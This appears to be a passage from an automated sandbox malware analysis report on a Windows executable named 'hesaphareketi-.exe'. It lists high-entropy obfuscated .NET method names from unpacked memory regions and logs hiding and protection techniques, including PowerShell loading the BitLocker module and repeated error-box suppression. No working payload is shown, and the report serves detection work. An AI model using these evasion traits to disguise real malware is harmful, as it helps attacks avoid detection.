                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, oQpmhd4r5iwAnLRPaP.csHigh entropy of concatenated method names: 'amJDVd9bri', 'IvrDeO1IMX', 'SjIDjOeH67', 'SEFD1UnAOl', 'RjKDq8sxfh', 'CsZDHRju43', 'n05DQB6Jqq', 'zaqDv3rdXQ', 'GhVFnEmCS4ggKaU4AtT', 'N027I1mh6yKcaFAtOsI'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, I2ZIZVPBTtNjif6squ.csHigh entropy of concatenated method names: 'RL3Z5YqOIC', 'PwOZ6GvKNL', 'lUfZwX8K1A', 'RVKZ2w23fY', 'iG9ZOTqo6V', 'oSXZLC8flE', 'S0AZ3ebxet', 'TAQZYaN6aE', 'LdLZhsrqYZ', 'XAsZf7Wmfw'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, RYSffYx74tovXyPNq8.csHigh entropy of concatenated method names: 'ACLdnDmMKAedtmc4Ubh', 'ijQ3lnmGea0YTc12irf', 'EeQDcrsvJH', 'P0ODU0qCRr', 'H5sDS267GD', 'W6hL13mc9dACZd6K0RF', 'SO7HKKmr069DKXxhXS4', 'oGlMvVmPs8grquUi5yI'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, Ns6WxG6JJs23MoSyQa.csHigh entropy of concatenated method names: 'Ec9DP1m7kJ', 'GXZDrlYRiN', 'hp0DNljyD1', 'obBDGj1QAv', 'cfUD05gIth', 'fGcNpJbEpw', 'HLINE2mi3f', 'GqIN4pIUXd', 'dv1N7jiYc7', 'gTpNl5qCa7'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, Lqr0bsOQB24ffAbaU0.csHigh entropy of concatenated method names: 'T9Lj2gp4y', 'UN01YOoT7', 'QRpqLcimi', 'zHOHpD2SH', 'KQ2Qh68ib', 'Wk1v24EUQ', 'XsvIVqDCVB277oitvs', 'F0YN3Uba74vef8q4Ns', 'aPTXUZ2qSbubpvCT6X', 'NCQcuYC87'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, zmiQjjSMJdWZJXd8i5.csHigh entropy of concatenated method names: 'N5QUywLRor', 'KTtUI9fgoB', 'YlCU8rcBAD', 'dfdUF2QpZ2', 'TLNUrE9gee', 'BE1UNcom57', 'f0dUDIpLWx', 'QFKc4rlyZF', 'Kb3c7p6UmA', 'XsVclN12jH'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, ON4CPXgoxV3DOvXlQ5.csHigh entropy of concatenated method names: 'k5iyG1cZBi', 'KQny0YEH2x', 'niYyamQWfY', 'q6gy9cUH4R', 'XgyyZLKmPb', 'WbTym5FWFj', 'dTqebX5xvev3HEc98g', 'R0uMN1WgtaZTc9Nc5O', 'v3Fyyq00mB', 'N26yIYWngm'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, PlruwwFSFIBK3gOuLd.csHigh entropy of concatenated method names: 'es3Rau1EMH', 'FBbR9OnXuQ', 'ToString', 'OquRFeKa6W', 'ImbRrO3PEk', 'nSvRuM5G26', 'hfERNpdWx7', 'Yt4RD4xrV4', 'ngIRGaqaRe', 'qjgR0t4ZyV'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.csHigh entropy of concatenated method names: 'mpRIPb1xbw', 'lywIF84dei', 'UIbIryE6JI', 'pxsIuLDrEk', 'BlrINROGGm', 'bcwID1NyU2', 'TGNIGdXspo', 'fNII0cJ2vm', 'FYHIJMZyv1', 'Gp5IaSaIXy'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, fVLyc0wGGeEWOEyCIF.csHigh entropy of concatenated method names: 'ToString', 'q5Kmt4iijv', 'e5rmOAOR2H', 'MykmLY8Tkm', 'tfsm3ZkqKd', 'VE7mYSFosR', 'SZRmhY3L48', 'Km2mfbHgu9', 'Hf8mkfAhFJ', 'ejymWvqasA'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, LnxKS42KcnqItRqAuu.csHigh entropy of concatenated method names: 'Dispose', 'XWiyllSwLx', 'PEYdOwCRtM', 'w5Vyysa243', 'fYwyMGOgX8', 'sJEyzwgtve', 'ProcessDialogKey', 'jk6ds2SYkm', 'ClqdybiHbe', 'o7LddJmdgE'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, LWO8HtWIprHTVfDJ67.csHigh entropy of concatenated method names: 'lUHcFpUWvN', 'i0LcracVbs', 'LpQcugyeoE', 'WnhcNJdsPJ', 'W80cDwPhZT', 'oNGcG0LnZa', 'KOFc08Nf3A', 'a6AcJDroc5', 'GtYcaMOp3o', 'vDQc9awuE2'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, BNsSQdbVfiKRX0TD04.csHigh entropy of concatenated method names: 'Fcdu1pnCE5', 'rA3uqHqgOY', 'QcWuB9AAJa', 'kY5uQ4EJIX', 'iqAuZEWVpV', 'kP2umN5yci', 'gn6uRIrgmc', 'rRIucGu9Cy', 'YlxuU1mRJ9', 'sPpuSWQVY2'
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, Yx3ZQZz8qF3UpkSV59.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CryUAGi7Zg', 'TX0UZTqhR6', 'y9eUmjDlRQ', 'rYOURDcnIL', 'CU6UcoN2lB', 'BHeUUkC0ju', 'p0PUS9SBSP'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, zmrE9pD9ep1r9k23rF.csHigh entropy of concatenated method names: 'wimGep4Ncw', 'KDXGnPYBPu', 'MciGjDpAip', 'wBqG1Q3rMJ', 'uhpGgbyfNm', 'nW7GqfSrAP', 'CAWGHGkjDg', 'W6MGBrYn3c', 'OjfGQwqUuZ', 'KYPGvCZPa1'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, T07tVaZ0AMMeqsdvSwl.csHigh entropy of concatenated method names: 'B4kUeNA6jL', 'hsaUnoFX48', 'Tx0Ujltdkv', 'zluU15TMk2', 'LgAUgh2Bmb', 'dsSUqGVjnu', 'k3lUHgN4SV', 'kd7UBNgh6m', 'KaRUQ9Bjyn', 'YSxUvs1Nx5'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, wOCJmfL0gmf77p4iB8.csHigh entropy of concatenated method names: 'uJ1R73CtsP', 'OTXRMR9DA3', 'JlQcsD3f9m', 'xKKcywccaM', 'q4jRt8hF2Q', 'GTBR69eOmA', 'htlRxI57sh', 'f6ZRwU60FH', 'U1vR22fLmT', 'RwGRXTCAqw'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, uWkYiBZiTyhGfff9TEp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qDcSwaTQKO', 'wUMS2DJAuw', 'QnrSXN7oBl', 'VGASTPmky7', 'DEuSpuopLC', 'pD2SEAJrKI', 'LrOS4scT3B'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, apNwUAYQDNK2jjOBr5.csHigh entropy of concatenated method names: 'Ys5rwFb1q7', 'nKnr2qB7lf', 'yccrXKvVPo', 'jpNrTbvbsy', 'D9grpFBac8', 'iPArEmXaI6', 'WJer4OMdvY', 'tYkr7yX9Ph', 'cyArl9emlJ', 'snHrMdXG8c'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, QaepiORFDMaUInoOaF.csHigh entropy of concatenated method names: 'ssAci6ZJkn', 'i8ycOMombS', 'nWucLj9RAX', 'CUic34EU3t', 'TLDcwh7TSV', 'UuPcYYrULV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, ye8JTKJr83WH8wyxZ0.csHigh entropy of concatenated method names: 'hTBABjSKjX', 'JnaAQPNnAL', 'ue1AitWEsj', 'nnKAO8vZFx', 'XO3A310rCI', 'g12AYqgShn', 'lytAfrqbRT', 'cTeAkg5vdE', 'm8QA5oCyoc', 'IhPAtZuv9q'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, oQpmhd4r5iwAnLRPaP.csHigh entropy of concatenated method names: 'amJDVd9bri', 'IvrDeO1IMX', 'SjIDjOeH67', 'SEFD1UnAOl', 'RjKDq8sxfh', 'CsZDHRju43', 'n05DQB6Jqq', 'zaqDv3rdXQ', 'GhVFnEmCS4ggKaU4AtT', 'N027I1mh6yKcaFAtOsI'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, I2ZIZVPBTtNjif6squ.csHigh entropy of concatenated method names: 'RL3Z5YqOIC', 'PwOZ6GvKNL', 'lUfZwX8K1A', 'RVKZ2w23fY', 'iG9ZOTqo6V', 'oSXZLC8flE', 'S0AZ3ebxet', 'TAQZYaN6aE', 'LdLZhsrqYZ', 'XAsZf7Wmfw'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, RYSffYx74tovXyPNq8.csHigh entropy of concatenated method names: 'ACLdnDmMKAedtmc4Ubh', 'ijQ3lnmGea0YTc12irf', 'EeQDcrsvJH', 'P0ODU0qCRr', 'H5sDS267GD', 'W6hL13mc9dACZd6K0RF', 'SO7HKKmr069DKXxhXS4', 'oGlMvVmPs8grquUi5yI'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, Ns6WxG6JJs23MoSyQa.csHigh entropy of concatenated method names: 'Ec9DP1m7kJ', 'GXZDrlYRiN', 'hp0DNljyD1', 'obBDGj1QAv', 'cfUD05gIth', 'fGcNpJbEpw', 'HLINE2mi3f', 'GqIN4pIUXd', 'dv1N7jiYc7', 'gTpNl5qCa7'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, Lqr0bsOQB24ffAbaU0.csHigh entropy of concatenated method names: 'T9Lj2gp4y', 'UN01YOoT7', 'QRpqLcimi', 'zHOHpD2SH', 'KQ2Qh68ib', 'Wk1v24EUQ', 'XsvIVqDCVB277oitvs', 'F0YN3Uba74vef8q4Ns', 'aPTXUZ2qSbubpvCT6X', 'NCQcuYC87'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, zmiQjjSMJdWZJXd8i5.csHigh entropy of concatenated method names: 'N5QUywLRor', 'KTtUI9fgoB', 'YlCU8rcBAD', 'dfdUF2QpZ2', 'TLNUrE9gee', 'BE1UNcom57', 'f0dUDIpLWx', 'QFKc4rlyZF', 'Kb3c7p6UmA', 'XsVclN12jH'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, ON4CPXgoxV3DOvXlQ5.csHigh entropy of concatenated method names: 'k5iyG1cZBi', 'KQny0YEH2x', 'niYyamQWfY', 'q6gy9cUH4R', 'XgyyZLKmPb', 'WbTym5FWFj', 'dTqebX5xvev3HEc98g', 'R0uMN1WgtaZTc9Nc5O', 'v3Fyyq00mB', 'N26yIYWngm'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, PlruwwFSFIBK3gOuLd.csHigh entropy of concatenated method names: 'es3Rau1EMH', 'FBbR9OnXuQ', 'ToString', 'OquRFeKa6W', 'ImbRrO3PEk', 'nSvRuM5G26', 'hfERNpdWx7', 'Yt4RD4xrV4', 'ngIRGaqaRe', 'qjgR0t4ZyV'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.csHigh entropy of concatenated method names: 'mpRIPb1xbw', 'lywIF84dei', 'UIbIryE6JI', 'pxsIuLDrEk', 'BlrINROGGm', 'bcwID1NyU2', 'TGNIGdXspo', 'fNII0cJ2vm', 'FYHIJMZyv1', 'Gp5IaSaIXy'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, fVLyc0wGGeEWOEyCIF.csHigh entropy of concatenated method names: 'ToString', 'q5Kmt4iijv', 'e5rmOAOR2H', 'MykmLY8Tkm', 'tfsm3ZkqKd', 'VE7mYSFosR', 'SZRmhY3L48', 'Km2mfbHgu9', 'Hf8mkfAhFJ', 'ejymWvqasA'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, LnxKS42KcnqItRqAuu.csHigh entropy of concatenated method names: 'Dispose', 'XWiyllSwLx', 'PEYdOwCRtM', 'w5Vyysa243', 'fYwyMGOgX8', 'sJEyzwgtve', 'ProcessDialogKey', 'jk6ds2SYkm', 'ClqdybiHbe', 'o7LddJmdgE'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, LWO8HtWIprHTVfDJ67.csHigh entropy of concatenated method names: 'lUHcFpUWvN', 'i0LcracVbs', 'LpQcugyeoE', 'WnhcNJdsPJ', 'W80cDwPhZT', 'oNGcG0LnZa', 'KOFc08Nf3A', 'a6AcJDroc5', 'GtYcaMOp3o', 'vDQc9awuE2'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, BNsSQdbVfiKRX0TD04.csHigh entropy of concatenated method names: 'Fcdu1pnCE5', 'rA3uqHqgOY', 'QcWuB9AAJa', 'kY5uQ4EJIX', 'iqAuZEWVpV', 'kP2umN5yci', 'gn6uRIrgmc', 'rRIucGu9Cy', 'YlxuU1mRJ9', 'sPpuSWQVY2'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, Yx3ZQZz8qF3UpkSV59.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CryUAGi7Zg', 'TX0UZTqhR6', 'y9eUmjDlRQ', 'rYOURDcnIL', 'CU6UcoN2lB', 'BHeUUkC0ju', 'p0PUS9SBSP'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
